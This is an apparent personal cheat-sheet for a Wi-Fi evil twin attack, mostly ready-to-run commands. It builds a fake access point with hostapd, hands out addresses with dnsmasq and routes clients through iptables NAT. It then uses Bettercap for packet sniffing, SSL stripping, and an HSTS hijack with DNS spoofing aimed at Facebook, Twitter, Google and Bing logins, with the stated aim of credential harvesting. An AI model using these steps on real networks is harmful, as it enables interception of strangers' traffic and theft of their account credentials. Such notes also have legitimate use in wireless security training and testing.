Wi-Fi Evil Twin Attack & MITM

# Wi-Fi Evil Twin Attack & MITM Setting up a fake Access Point to hijack network traffic for MITM attacks, packet sniffing, and credential harvesting. ## Check capability Verify if the adapter supports **AP** (Master) mode: ```bash iw list | grep "Supported interface modes:" -A 10 ``` - **Requirement**: Output must contain `* AP`. ## Create Configuration (hostapd) Define how the fake AP behaves. ### Option A: Open Network (No Password) `open.conf`: ```ini interface=wlan0 driver=nl80211 ssid=Test_Open channel=3 hw_mode=g ``` ### Option B: Secured Network (WPA2) `secured.conf`: ```ini interface=wlan0 driver=nl80211 ssid=Test_Secure channel=3 hw_mode=g # WPA2 Settings wpa=2 wpa_passphrase=password wpa_key_mgmt=WPA-PSK wpa_pairwise=TKIP CCMP rsn_pairwise=CCMP ``` ### Start Access Point ```bash sudo hostapd open.conf ``` - **Success:** Look for `AP-ENABLED`. ## DHCP Setup Assign an IP to the AP and provide IPs to clients. ### 1. Set Gateway IP ```bash sudo ip addr add 192.168.1.1/24 dev wlan0 ``` ### 2. Start DHCP Server `dnsmasq` handles IP allocation. ```bash sudo dnsmasq --no-daemon --interface=wlan0 --dhcp-range=192.168.1.10,192.168.1.100,12h ``` ## Routing Setup (NAT) Enable clients to route traffic through your internet-facing interface (e.g., `eth0`). ### 1. Enable Forwarding & Clear Rules ```bash # Enable IP Forwarding sudo sysctl -w net.ipv4.ip_forward=1 # Clear old rules (Optional but safer) sudo iptables -F sudo iptables -t nat -F ``` ### 2. Setup NAT ```bash # Note: Ensure eth0 is your internet-facing interface sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Allow traffic forwarding (Crucial) sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT sudo iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT ``` > [!IMPORTANT] > ⚠️ **Troubleshooting: MASQUERADE Error (Kernel Mismatch)** > > **Scenario**: Occurs on Kali Linux when the system boots into a kernel where necessary NAT modules aren't installed (e.g., booting into a Real-Time kernel but modules exist only for the Standard kernel). > > **Error**: > `Warning: Extension MASQUERADE revision 0 not supported, missing kernel module?` > > **Verification & Fix**: > 1. **Check Running Kernel**: > ```bash > uname -r > ``` > 2. **Check Available Modules**: > ```bash > sudo updatedb && locate xt_MASQUERADE > ``` > 3. **Solution**: > Reboot the VM. At the GRUB menu, select **"Advanced options for Kali GNU/Linux"** and choose the kernel version that corresponds to the modules found in step 2. > 4. **Retry**: Run the NAT command again. ## SSL Stripping ![image](https://hackmd.io/_uploads/SkNsxZrBZx.png) 1. **Intercept**: The Fake AP intercepts the victim's initial HTTP request. 2. **Proxy**: Acting as a proxy, the Fake AP establishes a secure HTTPS connection with the target website on the victim's behalf. 3. **Strip & Replace**: Upon receiving the webpage, the Fake AP strips the encryption by replacing all `https://` links in the source code with `http://`. It then forwards the modified page to the victim, ensuring they remain trapped in an unencrypted channel. ### 1. Download Bettercap ```bash sudo apt update sudo apt install bettercap ``` ### 2. Setup NAT forwarding rules Force victim's HTTP traffic into Bettercap before it goes to the internet. ```bash sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080 ``` ### 3. Start Bettercap (Standard Mode) Use this for basic HTTP sites (non-HSTS). ```bash sudo bettercap -iface wlan0 ``` #### Enable Sniffing & Proxy Start the network sniffer and the HTTP proxy with the SSL strip module enabled. ```bash # Enable Packet Sniffing net.sniff on # Enable SSL Stripping (Force HTTPS -> HTTP) set http.proxy.sslstrip true # Start the Proxy Server http.proxy on ``` ## HSTS Hijack Standard stripping fails on most websites due to HSTS. Use this method to spoof domains (e.g., `google.com` -> `google.corn`) to bypass browser protection. ### 1. DNS Setup Force any domain ending in `.corn` to resolve to the attacker's IP. This ensures the fake links generated by Bettercap are routable. ```bash # Note: Ensure you kill the old dnsmasq process first sudo killall dnsmasq sudo dnsmasq --no-daemon --interface=wlan0 --dhcp-range=192.168.1.10,192.168.1.100,12h --address=/corn/192.168.1.1 ``` ### 2. Start Bettercap with Caplet Update and load the HSTS Hijack script. ```bash sudo bettercap -eval "caplets.update; ui.update; q" sudo bettercap -iface wlan0 -caplet hstshijack/hstshijack ``` ### 3. Configure & Launch (Inside Bettercap) ```bash # 1. Set Targets (The domains you want to spoof) set hstshijack.targets facebook.com,twitter.com,google.com,bing.com # 2. Start Modules # Spoof DNS responses to point to attacker dns.spoof on # Start Proxy http.proxy on ``` ## Cleanup ### Option A: Manual Cleanup ```bash # 1. Stop services sudo killall dnsmasq hostapd # 2. Clear IPTables rules (NAT & Redirects) sudo iptables -F sudo iptables -t nat -F ``` ### Option B: Reboot ```bash sudo reboot ```